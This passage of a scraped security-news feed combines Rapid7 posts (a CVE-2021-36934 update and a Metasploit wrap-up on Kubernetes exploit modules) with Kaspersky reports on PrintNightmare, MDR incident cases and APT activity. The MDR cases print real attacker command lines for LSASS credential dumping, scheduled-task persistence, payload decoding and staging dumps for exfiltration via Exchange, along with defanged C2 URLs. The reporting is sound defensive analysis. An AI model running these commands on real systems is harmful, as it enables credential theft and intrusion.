We will update this blog with new information as it becomes available.\n\n## Updates\n\n**July 27, 2021:** Microsoft has **removed Windows Server 2019 and Windows Server 20H2** from the list of versions affected by CVE-2021-36934.\n\n**July 22, 2021:** Microsoft added Windows Server 2019 and Windows Server 20H2 to the [list of affected versions](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>).\n\n## Resources\n\n * [Microsoft advisory for CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)\n * [CERT/CC vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>)\n * [Public PoC for CVE-2021-36934](<https://github.com/GossiTheDog/HiveNightmare>)\n * [Additional demo and analysis of CVE-2021-36934](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)", "cvss3": {}, "published": "2021-07-21T16:01:19", "type": "rapid7blog", "title": "Microsoft SAM File Readability CVE-2021-36934: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T16:01:19", "id": "RAPID7BLOG:21FF66FD08C23AC39BCCB8CFE2238507", "href": "https://blog.rapid7.com/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T15:05:39", "description": "## We just couldn't contain ourselves!\n\n\n\nThis week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! 
Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.\n\n## Atlassian Confluence WebWork OGNL Injection gets Windows support\n\nYou might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7\u2019s own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.\n\n## New module content (2)\n\n * [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.\n * [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. 
The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.\n\n## Enhancements and features\n\n * [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) \\- Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.\n * [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. 
The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.\n\n## Bugs fixed\n\n * [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)\n * [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-10-22T14:25:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T14:25:55", "id": "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "href": "https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2021-12-15T10:54:49", "description": "\n\n_Kaspersky Managed Detection and Response (MDR) provides advanced protection against the growing number of threats that bypass automatic security barriers. Its capabilities are backed by a highly professional team of security analysts operating all over the world. Each suspicious security event is validated by our analysts, complementing the automatic detection logic and letting us continuously improve the detection rules._\n\n_The MDR results allow us to map out the modern threat landscape and show techniques used by attackers right now. We share these results with you so that you are more informed about in-the-wild attacks and better prepared to respond._\n\n## PrintNightmare vulnerability exploitation\n\nThis summer, we witnessed a series of attacks using a dangerous vulnerability in the Windows Print Spooler service: **CVE-2021-1675/CVE-2021-34527**, also known as [PrintNightmare](<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>). This vulnerability was published in June 2021 and allows attackers to add arbitrary printer drivers in the spooler service and thus remotely execute code on a vulnerable host under System privileges. 
We have already [published](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) the technical details of this vulnerability, and today we will talk about how MDR analysts detected and investigated attacks that exploit this vulnerability in real companies.\n\n### Case #1\n\nShortly after the PrintNightmare vulnerability was published, a detailed report with a technical description of the problem, as well as a working PoC exploit, was posted on GitHub by mistake. The repository was taken offline several hours later, but during this time several other users managed to clone it.\n\nKaspersky detected an attempt to exploit the PrintNightmare vulnerability using this publicly available tool. The MDR team observed the spooler service accessing suspicious _DLL_ libraries. It should be noted that the file names used by the attacker were exactly the same as those available in the public exploit on GitHub.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | Kaspersky detected suspicious DLL libraries (nightmare.dll) on the monitored host. | C:\\Windows\\System32\\spool\\drivers\\x64\\3\\nightmare.dll C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\nightmare.dll \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | In addition, the following script was found on the host. 
| \\cve-2021-1675-main-powershell\\cve-2021-1675-main\\cve-2021-1675.ps1 \n \nThe table below contains signs of suspicious activity that served as a starting point for the investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1210:** \nExploitation of \nRemote \nServices | Local File Modification | Modified file path: \nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\ \n1\\nightmare.dll \nFile modifier: \nC:\\Windows\\System32\\spoolsv.exe \nParent of the modifier: \nC:\\Windows\\System32\\services.exe | Legitimate spoolsv.exe \nlocally modified \nc:\\windows\\system32 \n\\spool\\drivers\\x64\\ \n3\\old\\1\\nightmare.dll \n**T1588.005:** \nObtain \nCapabilities: \nExploits | AV exact detect in \nOnAccess mode | File: \n\\cve-2021-1675-main-powershell\\cve-2021- \n1675-main\\cve-2021-1675.ps1 \nAV verdicts: \nExploit.Win64.CVE-2021-1675.c; \nUDS:Exploit.Win64.CVE-2021-1675.c | CVE-2021-1675 exploit \nwas detected and \nsuccessfully deleted \nby AM engine \n \n### Case #2\n\nIn another case, MDR analysts discovered a different attack scenario related to the exploitation of the PrintNightmare vulnerability. In particular, _spooler_ service access to suspicious _DLL_ files was observed. In addition, the _spooler_ service executed some unusual commands and established a network connection. Based on the tools used by attackers, we presume that this activity was related to penetration testing.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150920/MDR_interesting_cases_02.png>) | MDR analyst detected the creation of suspicious _DLL_ libraries using the _certutil.exe_ tool on a monitored host. \nAfter that, the _spooler_ service was added to the planned tasks. 
| C:\\Windows\\System32\\spool\\drivers\\x64\\3\\new\\hello.dll \nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\new\\unidrv.dll\u2026 \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Next, the spooler service called the newly created _DLL_ files. \nIn addition, the attacker ran some of the created libraries using the rundll32 component. | \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | Several hours later, a new wave of activity began. The Kaspersky MDR team detected a registry key modification that forces NTLMv1 authentication. It potentially allows [NTLM hashes](<https://book.hacktricks.xyz/windows/ntlm#basic-ntlm-domain-authentication-scheme>) to be intercepted. | \\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\MSV1_0 \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | Then the attacker re-added spooler to the planned tasks. \nAfter that, execution of various commands on the host with System privileges was observed. 
The source of this activity was the _c:\\windows\\system32\\spoolsv.exe_ process | C:\\Windows\\System32\\cmd.exe /c \nnet start spooler \nC:\\Windows\\System32\\cmd.exe /c \ntimeout 600 > NUL && \nnet start spooler \n \nThe table below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1570:** \nLateral Tool Transfer | Web AV exact detect in _OnDownload_ mode | AV verdict: HEUR:Trojan.Win32.Shelma.gen | Attacker downloads \nsuspicious DLL (that is, \nMeterpreter payload) via \nHTTP \n**T1140:** \nDeobfuscate/Decode Files or Information | Local File Modification | Process command lines: \ncertutil -decode 1.txt \nC:\\Share\\hello4.dll | Attacker used _certutil_ \nto decode text file into PE \nbinary \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | AV exact detect in _OnAccess_ mode | AV verdicts: \nVHO:Trojan-PSW.Win64.Mimikatz.gen \nTrojan-PSW.Win32.Mimikatz.gen | Attacker tried to use \nMimikatz \n**T1127.001:** \nTrusted Developer Utilities Proxy Execution: MSBuild | Outbound network connection | Process command line: \nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe C:\\Share\\1.xml | MSBuild network activity \n**T1210:** \nExploitation of Remote Services | Local File Modification | Modified file path: \nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\hello5.dll \nFile modifier: \nC:\\Windows\\System32\\spoolsv.exe \nParent of the modifier: \nC:\\Windows\\System32\\services.exe | Legitimate \nspoolsv.exe locally \nmodified \nc:\\windows\\system32\\spool\\drivers\\x64\\3\\old\\1\\hello5.dll \n**T1547.012:** \nBoot or Logon Autostart Execution: Print Processors \n**T1033:** \nSystem Owner/User Discovery | Process start | Command line: whoami \nProcess integrity level: System \nParent process: \nC:\\WINDOWS\\System32\\spoolsv.exe \nGrandparent 
process: \nC:\\Windows\\System32\\services.exe | Legitimate \nspoolsv.exe started \nwhoami with System \nintegrity level \n**T1547.012:** \nBoot or Logon Autostart Execution: Print Processors | Outbound network connection | Process command line: \nC:\\Windows\\System32\\spoolsv.exe \nRemote TCP port: 4444/TCP | Legitimate \nspoolsv.exe made a \nconnection to default \nMeterpreter port \n(4444/TCP) \n**T1547.012:** \nBoot or Logon Autostart Execution: Print Processors \n**T1059.003:** \nCommand and Scripting Interpreter: Windows Command Shell \n**T1033:** \nSystem Owner/User Discovery | Process start | Command line: whoami \nProcess integrity level: System \nParent process: \nC:\\Windows\\System32\\cmd.exe \nGrandparent process: \nC:\\Windows\\System32\\spoolsv.exe | Legitimate \nspoolsv.exe started \ncmd.exe that started \nwhoami with System \nintegrity level \n \n## MuddyWater attack\n\nIn this case, the Kaspersky MDR team detected a request from the customer's infrastructure to a malicious APT related host. Further investigation allowed us to attribute this attack to the [MuddyWater group](<https://attack.mitre.org/groups/G0069/>). MuddyWater is a threat actor that first surfaced in 2017. This APT group mainly targets government agencies in Iraq, Saudi Arabia, Jordan, Turkey, Azerbaijan, and Pakistan. Kaspersky's report on this group's activity is available [here](<https://securelist.com/muddywaters-arsenal/90659/>).\n\nAmong other methods, the group uses VBS implants in phishing emails as an initial attack vector. During execution, the implant accesses URLs with a common structure to connect to the C2 server. 
The typical structure of the URL is provided below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151840/MDR_interesting_cases_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14152658/MDR_interesting_cases_06.png>) | First of all, MDR analysts found a VBS implant from startup, presumably related to the MuddyWater group, to be running on the monitored host. | \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KLWB6.vbs \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After script execution, some malicious resources were accessed. The structure of these URLs follows the common structure used by the MuddyWater group. In addition, the accessed IP address was observed in other attacks of this group. | hxxp://185[.]117[.]73[.]52:443/getTarget \nInfo?guid=xxx-yyy-zzz&status=1 \nhxxp://185[.]117[.]73[.]52:443/getComman \nd?guid=xxx-yyy-zzz* \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14153224/MDR_interesting_cases_07.png>) | Next, execution of commands to collect information from the compromised host was observed. 
| "C:\\Windows\\System32\\cmd.exe" /c \nexplorer.exe >> \nc:\\ProgramData\\app_setting_readme.txt "C:\\Windows\\System32\\cmd.exe" /c whoami >> c:\\ProgramData\\app_setting_readme.txt \n \n**_* xxx is the company short name (identifier), yyy is the victim hostname and zzz is the username_**\n\nThe table below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1071:** \nApplication Layer Protocol | Access to malicious hosts from non-browsers | Target URL: \nhxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=xxx-yyy-zzz&status=1 \nCMD line: \n"C:\\Windows\\System32\\WScript.exe" C:\\Users\\USERNAME\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KLWB6.vbs \nProcess: \nC:\\Windows\\system32\\wscript.exe | VBS script accessed malicious URL during execution \n**T1071:** \nApplication Layer Protocol | URL exact detect | Malicious URL: \nhxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid=xxx-yyy-zzz&status=1 \nAV verdict: \nMalware | Malicious URL was successfully detected by AV \n \n## Credential Dumping from LSASS Memory\n\nIn the last case, we'd like to talk about an attack related to collecting credentials from the LSASS process memory dump (T1003.001 MITRE technique). Local Security Authority Subsystem Service (LSASS) stores a variety of credentials in process memory. These credentials can be harvested by a System or administrative user and then used for attack development or lateral movement.\n\nMDR analysts detected an attempt to dump the LSASS process memory on the monitored host, despite the fact that most of the attacker's actions did not differ from the usual actions of an administrator. The attackers used two public tools (the first one was detected and blocked by an AV solution) to dump the LSASS process memory and export the obtained dump via the Exchange server. 
In particular, the MDR team observed the download and execution of a suspicious DLL file (categorized as SSP) by LSASS.exe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151347/MDR_interesting_cases_04.png>) | The attacker executed several recon commands to get more information about the host, and then ran commands to get the LSASS process ID. | C:\\Windows\\System32\\tasklist.exe \nC:\\Windows\\System32\\findstr.exe /i sass \n---|---|--- \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14150937/MDR_interesting_cases_01.png>) | After that, the attacker tried to run a malicious tool to dump the process memory, but it was blocked by an endpoint protection solution. | "C:\\Windows\\System32\\rundll32.exe" \nC:\\Windows\\System32\\comsvcs.dll MiniDump 616 \nc:\\programdata\\cdera.bin full\n\n_## 616 is LSASS process id_ \n \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154017/MDR_interesting_cases_08.png>) | Then the attacker tried to dump the LSASS process memory using another tool. They unzipped an archive containing the _resource.exe_ and _twindump.dll_ files. | C:\\Windows\\System32\\cmd.exe /C c:\\"program files"\\7- \nzip\\7z.exe x -pKJERKL6j4dk&@1 c:\\programdata\\m.zip -o \nc:\\windows\\cluster\n\n## _resource.exe_ and _twindump.dll_ files were created \n \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14151142/MDR_interesting_cases_03.png>) | Subsequently, the file _resource.exe_ was added to the planned tasks and executed. However, the attempt to obtain an LSASS dump was unsuccessful. 
| C:\\Windows\\System32\\cmd.exe /C \nC:\\Windows\\System32\\staskes.exe /create /tn Ecoh /tr \n"cmd /c C:\\Windows\\cluster\\resource.exe \nase2af6das3fzc2 agasg2aa23gfdgd" /sc onstart /ru \nsystem /F\n\n## staskes.exe is a renamed schtasks.exe file \n \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154042/MDR_interesting_cases_09.png>) | Later, one more attempt to perform this technique was made. The attacker unpacked an archive containing another malicious utility, and ran it the same way as previously. The created files are presumably related to the [MirrorDump](<https://github.com/CCob/MirrorDump>) tool. As a result, the attacker successfully obtained an LSASS dump. | C:\\Windows\\System32\\cmd.exe /C c:\\"program files"\\7- \nzip\\7z.exe x -p"KJERfK#L6j4dk321\u2033 \nc:\\programdata\\E.zip -o c:\\programdata\\ \nC:\\Windows\\System32\\cmd.exe \n/C c:\\windows\\system32\\staskes.exe /create /tn Ecoh /tr \n"c:\\programdata\\InEnglish.exe g2@j5js1 0sdfs,48 \nC:\\programdata\\EnglishEDouble \nC:\\programdata\\EnglishDDouble \nC:\\programdata\\English1.dll \nC:\\programdata\\English.dmp" /sc onstart /ru system /F C:\\Windows\\System32\\cmd.exe /C c:\\windows\\system32\\staskes.exe /run /tn Ecoh \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/12/14154059/MDR_interesting_cases_10.png>) | Then the obtained dump was exported to Exchange server. Afterwards, the attacker deleted all the created files. 
| C:\\Windows\\System32\\cmd.exe /C copy \nc:\\programdata\\Es.zip \nc:\\Program Files\\Microsoft\\Exchange Server\\V14\\ClientAccess\\owa\\auth\\Es.png \n \nThe table below contains signs of suspicious activity that were the starting point for investigation.\n\n**MITRE ATT&CK Technique** | **MDR telemetry event type used** | **Detection details** | **Description** \n---|---|---|--- \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | AV exact detect | AV verdict: \nPDM:Exploit.Win32.Generic \nProcess command line: \n"C:\\Windows\\System32\\rundll32.exe" \nC:\\Windows\\System32\\comsvcs.dll MiniDump \n**616** C:\\programdata\\cdera.bin full \nParent process command line: \nC:\\Windows\\System32\\wsmprovhost.exe -Embedding \nGrandparent process command line: \nC:\\Windows\\System32\\svchost.exe -k DcomLaunch \nProcess logon type: 3 (Network logon) | Remotely executed \nprocess memory dump \nwas detected by AM \nengine \n**616** is LSASS process \nPID \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | Create section (load DLL) \nExecute section (run DLL) | DLL name: C:\\programdata\\english1.dll \nProcess: C:\\Windows\\System32\\lsass.exe \nProcess PID: **616** \nParent process command line: C:\\Windows\\System32\\wininit.exe \nProcess integrity level: System | Unknown DLL was loaded and executed within lsass.exe \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | Inexact AV detect | Internal AV verdict: The file is Security Support \nProvider (SSP) \nFile path: C:\\programdata\\english1.dll \nProcess: C:\\Windows\\System32\\lsass.exe | Unknown DLL loaded to lsass is SSP \n**T1053.005:** \nScheduled Task/Job: Scheduled Task | Create process | Process command line: \nC:\\programdata\\InEnglish.exe g2@j5js1 \n0sdfs,48 C:\\programdata\\EnglishEDouble C:\\programdata\\EnglishDDouble \nC:\\programdata\\English1.dll \nC:\\programdata\\English.dmp \nParent process command line: \ntaskeng.exe {7725474B-D9EA-473D-B10D-AC0572A0AA70} S-1-5-18:NT 
\nAUTHORITY\\System:Service: \nGrandparent process command line: \nC:\\Windows\\System32\\svchost.exe -k netsvcs \nProcess integrity level: System \nProcess user SID: S-1-5-18 | Suspicious executable from C:\\programdata run as scheduled task under _System_ privileges \n \nObserved malicious files:\n\nc:\\programdata\\e.zip | 0x37630451944A1DD027F5A9B643790B10 \n---|--- \nc:\\programdata\\es.zip | 0x3319BD8B628F8051506EE8FD4999C4C3 \nc:\\programdata\\m.zip | 0xC15D90F8374393DA2533BAF7359E31F9 \nc:\\programdata\\inenglish.exe | 0xCB15B1F707315FB61E667E0218F7784D \nc:\\programdata\\english1.dll | 0x358C5061B8DF0E0699E936A0F48EAFE1 \nc:\\windows\\cluster\\resource.exe | 0x872A776C523FC33888C410081A650070 \nc:\\windows\\cluster\\twindump.dll | 0xF980FD026610E4D0B31BAA5902785EDE \n \n## Conclusion\n\nAttackers follow trends. They use any loophole to break into your corporate network. Sometimes they learn about new vulnerabilities in products earlier than security researchers do. Sometimes they hide so skillfully that their actions are indistinguishable from those of your employees or administrators.\n\nCountering targeted attacks requires extensive experience as well as constant learning. Kaspersky Managed Detection and Response delivers fully managed, individually tailored ongoing detection, prioritization, investigation, and response. 
As a result, it provides all the major benefits from having your own security operations center without having to actually set one up.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-15T10:00:42", "type": "securelist", "title": "Kaspersky Managed Detection and Response: interesting cases", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-12-15T10:00:42", "id": "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "href": "https://securelist.com/kaspersky-managed-detection-and-response-interesting-cases/105214/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:23", "description": "\n\n## Summary\n\nLast week Microsoft warned Windows users about vulnerabilities in the Windows Print Spooler service \u2013 CVE-2021-1675 and CVE-2021-34527 (also known as PrintNightmare). Both vulnerabilities can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. 
This service is enabled by default on all Windows clients and servers, including domain controllers.\n\nKaspersky products protect against attacks leveraging these vulnerabilities. The following detection names are used:\n\n * HEUR:Exploit.Win32.CVE-2021-1675.*\n * HEUR:Exploit.Win32.CVE-2021-34527.*\n * HEUR:Exploit.MSIL.CVE-2021-34527.*\n * HEUR:Exploit.Script.CVE-2021-34527.*\n * HEUR:Trojan-Dropper.Win32.Pegazus.gen\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * Exploit.Win32.CVE-2021-1675.*\n * Exploit.Win64.CVE-2021-1675.*\n\nOur detection logic also successfully blocks the attack technique from the latest Mimikatz framework v. 2.2.0-20210707.\n\nWe are closely monitoring the situation and improving generic detection of these vulnerabilities using our [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and Exploit Prevention components. As part of our [Managed Detection and Response service](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>), Kaspersky SOC experts are able to detect exploitation of these vulnerabilities, investigate such attacks and report to customers.\n\n## Technical details\n\n### CVE-2021-34527\n\nWhen using RPC protocols to add a new printer (_RpcAsyncAddPrinterDriver [MS-PAR] or RpcAddPrinterDriverEx [MS-RPRN]_), a client has to provide multiple parameters to the Print Spooler service:\n\n * _pDataFile_ - a path to a data file for this printer;\n * _pConfigFile_ - a path to a configuration file for this printer;\n * _pDriverPath_ - a path to a driver file that's used by this printer while it's working.\n\nThe service makes several checks to ensure _pDataFile_ and _pDriverPath_ are not UNC paths, but there is no corresponding check for _pConfigFile_, meaning the service will copy the configuration DLL to the folder _%SYSTEMROOT%\\system32\\spool\\drivers\\x64\\3\\_ (on x64 versions of the OS).\n\nNow, if the Windows Print Spooler 
service tries to add a printer again, but this time sets pDataFile to the copied DLL path (from the previous step), the print service will load this DLL because its path is not a UNC path, and the check will be successfully passed. These methods can be used by a low-privileged account, and the DLL is loaded by the _NT AUTHORITY\\SYSTEM group_ process.\n\n### CVE-2021-1675\n\nThe local version of PrintNightmare uses the same method for exploitation as CVE-2021-34527, but there's a difference in the entrypoint function (_AddPrinterDriverEx_). This means an attacker can place a malicious DLL in any locally accessible directory to run the exploit.\n\n## Mitigations\n\nKaspersky experts anticipate a growing number of exploitation attempts to gain access to resources inside corporate perimeters accompanied by a high risk of ransomware infection and data theft.\n\nTherefore, it is strongly recommended to follow Microsoft [guidelines](<https://docs.microsoft.com/en-us/defender-for-identity/cas-isp-print-spooler>) and apply the latest security updates for Windows.\n\nQuoting Microsoft (as of July 7th, 2021): \n_"Due to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. The recommended way to do this is using a Group Policy Object (GPO). 
\nWhile this security assessment focuses on domain controllers, any server is potentially at risk to this type of attack."_", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T05:00:06", "type": "securelist", "title": "Quick look at CVE-2021-1675 & CVE-2021-34527 (aka PrintNightmare)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T05:00:06", "id": "SECURELIST:0C07A61E6D92865F5B58728A60866991", "href": "https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T14:36:44", "description": "\n\n * **IT threat evolution Q3 2021**\n * [IT threat evolution in Q3 2021. PC statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)\n * [IT threat evolution in Q3 2021. 
Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n## Targeted attacks\n\n### WildPressure targets macOS\n\nLast March, we reported a [WildPressure campaign targeting industrial-related entities in the Middle East](<https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/>). While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.\n\nAnother language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol are quite recognizable across all three programming languages used by the authors.\n\nWildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.\n\nWe have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.\n\nYou can view our report on the new version [here](<https://securelist.com/wildpressure-targets-macos/103072/>), together with a video presentation of our findings.\n\n### LuminousMoth: sweeping attacks for the chosen few\n\nWe recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. 
